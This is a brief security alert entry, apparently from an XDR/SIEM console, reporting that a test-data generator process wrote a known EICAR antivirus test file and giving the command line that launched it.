Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "C:\app\cortex-xdr-siem-test\xdr_tools\MegaGenerator\bin\publish\MegaGenerator.exe" --once --scenarios 15 12-18 08:32